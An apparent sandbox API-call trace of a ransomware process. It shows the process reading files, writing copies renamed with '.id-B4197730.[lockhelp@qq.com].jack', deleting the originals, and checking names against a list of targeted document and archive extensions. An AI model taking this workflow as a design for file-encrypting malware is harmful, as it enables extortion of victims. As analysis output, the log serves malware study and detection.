[0197.484] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.485] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll")) returned 1 [0197.485] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0197.485] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0197.485] lstrlenW (lpString=".doc") returned 4 [0197.485] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.485] lstrlenW (lpString=".docx") returned 5 [0197.485] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.485] lstrlenW (lpString=".pdf") returned 4 [0197.485] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.485] lstrlenW (lpString=".xls") returned 4 [0197.485] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.485] lstrlenW (lpString=".xlsx") returned 5 [0197.485] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.485] lstrlenW (lpString=".ppt") returned 4 [0197.485] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.485] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0197.485] lstrlenW (lpString=".zip") returned 4 [0197.486] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.486] lstrlenW (lpString=".rar") returned 4 [0197.486] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.486] lstrlenW (lpString=".bz2") returned 4 [0197.486] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.486] lstrlenW (lpString=".7z") returned 3 [0197.486] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.486] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0197.486] lstrlenW (lpString=".dbf") returned 4 [0197.486] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.486] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0197.486] lstrlenW (lpString=".1cd") returned 4 [0197.486] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.486] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0197.486] lstrlenW (lpString=".jpg") returned 4 [0197.486] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.486] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0197.486] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0197.486] lstrlenW (lpString=".doc") returned 4 [0197.486] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.486] lstrlenW (lpString=".docx") returned 5 [0197.486] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.486] lstrlenW (lpString=".pdf") returned 4 [0197.486] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.486] lstrlenW (lpString=".xls") returned 4 [0197.486] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.486] lstrlenW (lpString=".xlsx") returned 5 [0197.486] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.487] lstrlenW (lpString=".ppt") returned 4 [0197.487] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.487] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0197.487] lstrlenW (lpString=".zip") returned 4 [0197.487] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.487] lstrlenW (lpString=".rar") returned 4 [0197.487] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.487] lstrlenW (lpString=".bz2") returned 4 [0197.487] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.487] lstrlenW (lpString=".7z") returned 3 [0197.487] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.487] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0197.487] lstrlenW (lpString=".dbf") returned 4 [0197.487] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.487] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0197.487] lstrlenW (lpString=".1cd") returned 4 [0197.487] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.487] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0197.487] lstrlenW (lpString=".jpg") returned 4 [0197.487] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.488] lstrcmpiW (lpString1=".ico", lpString2=".jack") returned -1 [0197.488] lstrlenW (lpString="Rotate5.ico") returned 11 [0197.488] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0197.488] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=894) returned 1 [0197.488] CloseHandle (hObject=0x3f8) returned 1 [0197.488] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico")) returned 0x80 [0197.488] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.488] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0197.488] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.489] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.489] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0197.489] GetLastError () returned 0x0 [0197.489] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x37e, lpOverlapped=0x0) returned 1 [0197.521] WriteFile (in: hFile=0x41c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x380, lpOverlapped=0x0) returned 1 [0197.522] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.523] WriteFile (in: hFile=0x41c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0xea, lpOverlapped=0x0) returned 1 [0197.523] SetEndOfFile (hFile=0x41c) returned 1 [0197.523] CloseHandle (hObject=0x41c) returned 1 [0197.524] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.524] SetEndOfFile (hFile=0x3f8) returned 1 [0197.525] CloseHandle (hObject=0x3f8) returned 1 [0197.525] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.525] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico")) returned 1 [0197.525] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0197.525] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0197.525] lstrlenW (lpString=".doc") returned 4 [0197.525] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.526] lstrlenW (lpString=".docx") returned 5 [0197.526] lstrcmpiW (lpString1=".docx", lpString2="5.ico") returned -1 [0197.526] lstrlenW (lpString=".pdf") returned 4 [0197.526] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.526] lstrlenW (lpString=".xls") returned 4 [0197.526] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.526] lstrlenW (lpString=".xlsx") returned 5 [0197.526] lstrcmpiW (lpString1=".xlsx", lpString2="5.ico") returned -1 [0197.526] lstrlenW (lpString=".ppt") returned 4 [0197.526] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.526] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0197.526] lstrlenW (lpString=".zip") returned 4 [0197.526] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.526] lstrlenW (lpString=".rar") returned 4 [0197.526] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.526] lstrlenW (lpString=".bz2") returned 4 [0197.526] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.526] lstrlenW (lpString=".7z") returned 3 [0197.526] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.526] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0197.526] lstrlenW (lpString=".dbf") returned 4 [0197.526] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.526] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0197.526] lstrlenW (lpString=".1cd") returned 4 [0197.526] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.526] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0197.526] lstrlenW (lpString=".jpg") returned 4 [0197.526] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.527] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0197.527] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0197.527] lstrlenW (lpString=".doc") returned 4 [0197.527] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.527] lstrlenW (lpString=".docx") returned 5 [0197.527] lstrcmpiW (lpString1=".docx", lpString2="5.ico") returned -1 [0197.527] lstrlenW (lpString=".pdf") returned 4 [0197.527] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.527] lstrlenW (lpString=".xls") returned 4 [0197.527] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.527] lstrlenW (lpString=".xlsx") returned 5 [0197.527] lstrcmpiW (lpString1=".xlsx", lpString2="5.ico") returned -1 [0197.527] lstrlenW (lpString=".ppt") returned 4 [0197.527] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.527] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0197.527] lstrlenW (lpString=".zip") returned 4 [0197.527] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.527] lstrlenW (lpString=".rar") returned 4 [0197.527] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.527] lstrlenW (lpString=".bz2") returned 4 [0197.527] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.527] lstrlenW (lpString=".7z") returned 3 [0197.527] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.527] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0197.527] lstrlenW (lpString=".dbf") returned 4 [0197.527] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.527] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0197.527] lstrlenW (lpString=".1cd") returned 4 [0197.527] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.528] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0197.528] lstrlenW (lpString=".jpg") returned 4 [0197.528] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.528] lstrcmpiW (lpString1=".ico", lpString2=".jack") returned -1 [0197.528] lstrlenW (lpString="Rotate8.ico") returned 11 [0197.528] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0197.551] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=894) returned 1 [0197.551] CloseHandle (hObject=0x3f8) returned 1 [0197.551] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico")) returned 0x80 [0197.552] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.552] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0197.552] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.552] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.552] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0197.553] GetLastError () returned 0x0 [0197.553] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x37e, lpOverlapped=0x0) returned 1 [0197.555] WriteFile (in: hFile=0x41c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x380, lpOverlapped=0x0) returned 1 [0197.564] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.564] WriteFile (in: hFile=0x41c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0xea, lpOverlapped=0x0) returned 1 [0197.564] SetEndOfFile (hFile=0x41c) returned 1 [0197.720] CloseHandle (hObject=0x41c) returned 1 [0197.724] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.724] SetEndOfFile (hFile=0x3f8) returned 1 [0197.725] CloseHandle (hObject=0x3f8) returned 1 [0197.725] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.725] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico")) returned 1 [0197.726] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0197.726] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0197.726] lstrlenW (lpString=".doc") returned 4 [0197.726] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.726] lstrlenW (lpString=".docx") returned 5 [0197.726] lstrcmpiW (lpString1=".docx", lpString2="8.ico") returned -1 [0197.726] lstrlenW (lpString=".pdf") returned 4 [0197.726] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.726] lstrlenW (lpString=".xls") returned 4 [0197.726] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.726] lstrlenW (lpString=".xlsx") returned 5 [0197.726] lstrcmpiW (lpString1=".xlsx", lpString2="8.ico") returned -1 [0197.726] lstrlenW (lpString=".ppt") returned 4 [0197.726] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.726] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0197.726] lstrlenW (lpString=".zip") returned 4 [0197.726] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.726] lstrlenW (lpString=".rar") returned 4 [0197.726] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.726] lstrlenW (lpString=".bz2") returned 4 [0197.726] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.726] lstrlenW (lpString=".7z") returned 3 [0197.726] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.726] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0197.726] lstrlenW (lpString=".dbf") returned 4 [0197.727] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.727] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0197.727] lstrlenW (lpString=".1cd") returned 4 [0197.727] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.727] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0197.727] lstrlenW (lpString=".jpg") returned 4 [0197.727] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.727] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0197.727] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0197.727] lstrlenW (lpString=".doc") returned 4 [0197.727] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.727] lstrlenW (lpString=".docx") returned 5 [0197.727] lstrcmpiW (lpString1=".docx", lpString2="8.ico") returned -1 [0197.727] lstrlenW (lpString=".pdf") returned 4 [0197.727] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.727] lstrlenW (lpString=".xls") returned 4 [0197.727] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.727] lstrlenW (lpString=".xlsx") returned 5 [0197.727] lstrcmpiW (lpString1=".xlsx", lpString2="8.ico") returned -1 [0197.727] lstrlenW (lpString=".ppt") returned 4 [0197.727] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.727] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0197.727] lstrlenW (lpString=".zip") returned 4 [0197.727] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.727] lstrlenW (lpString=".rar") returned 4 [0197.727] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.727] lstrlenW (lpString=".bz2") returned 4 [0197.728] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.728] lstrlenW (lpString=".7z") returned 3 [0197.728] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.728] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0197.728] lstrlenW (lpString=".dbf") returned 4 [0197.728] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.728] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0197.728] lstrlenW (lpString=".1cd") returned 4 [0197.728] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.728] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 42 [0197.728] lstrlenW (lpString=".jpg") returned 4 [0197.728] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.728] lstrcmpiW (lpString1=".ico", lpString2=".jack") returned -1 [0197.728] lstrlenW (lpString="Setup.ico") returned 9 [0197.728] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0197.729] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=36710) returned 1 [0197.729] CloseHandle (hObject=0x3f8) returned 1 [0197.729] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico")) returned 0x80 [0197.730] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.730] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0197.730] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.730] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.730] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0197.730] GetLastError () returned 0x0 [0197.730] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x8f66, lpOverlapped=0x0) returned 1 [0197.745] WriteFile (in: hFile=0x41c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x8f70, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x8f70, lpOverlapped=0x0) returned 1 [0197.746] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.747] WriteFile (in: hFile=0x41c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0xe6, lpOverlapped=0x0) returned 1 [0197.747] SetEndOfFile (hFile=0x41c) returned 1 [0197.747] CloseHandle (hObject=0x41c) returned 1 [0197.749] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.749] SetEndOfFile (hFile=0x3f8) returned 1 [0197.750] CloseHandle (hObject=0x3f8) returned 1 [0197.750] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.750] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico")) returned 1 [0197.750] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0197.751] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0197.751] lstrlenW (lpString=".doc") returned 4 [0197.751] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.751] lstrlenW (lpString=".docx") returned 5 [0197.751] lstrcmpiW (lpString1=".docx", lpString2="p.ico") returned -1 [0197.751] lstrlenW (lpString=".pdf") returned 4 [0197.751] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.751] lstrlenW (lpString=".xls") returned 4 [0197.751] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.751] lstrlenW (lpString=".xlsx") returned 5 [0197.751] lstrcmpiW (lpString1=".xlsx", lpString2="p.ico") returned -1 [0197.751] lstrlenW (lpString=".ppt") returned 4 [0197.751] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.751] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0197.751] lstrlenW (lpString=".zip") returned 4 [0197.751] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.751] lstrlenW (lpString=".rar") returned 4 [0197.751] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.751] lstrlenW (lpString=".bz2") returned 4 [0197.751] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.751] lstrlenW (lpString=".7z") returned 3 [0197.751] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.751] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0197.751] lstrlenW (lpString=".dbf") returned 4 [0197.751] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.751] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0197.751] lstrlenW (lpString=".1cd") returned 4 [0197.751] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.751] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0197.752] lstrlenW (lpString=".jpg") returned 4 [0197.752] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.752] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0197.752] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 40 [0197.752] lstrlenW (lpString=".doc") returned 4 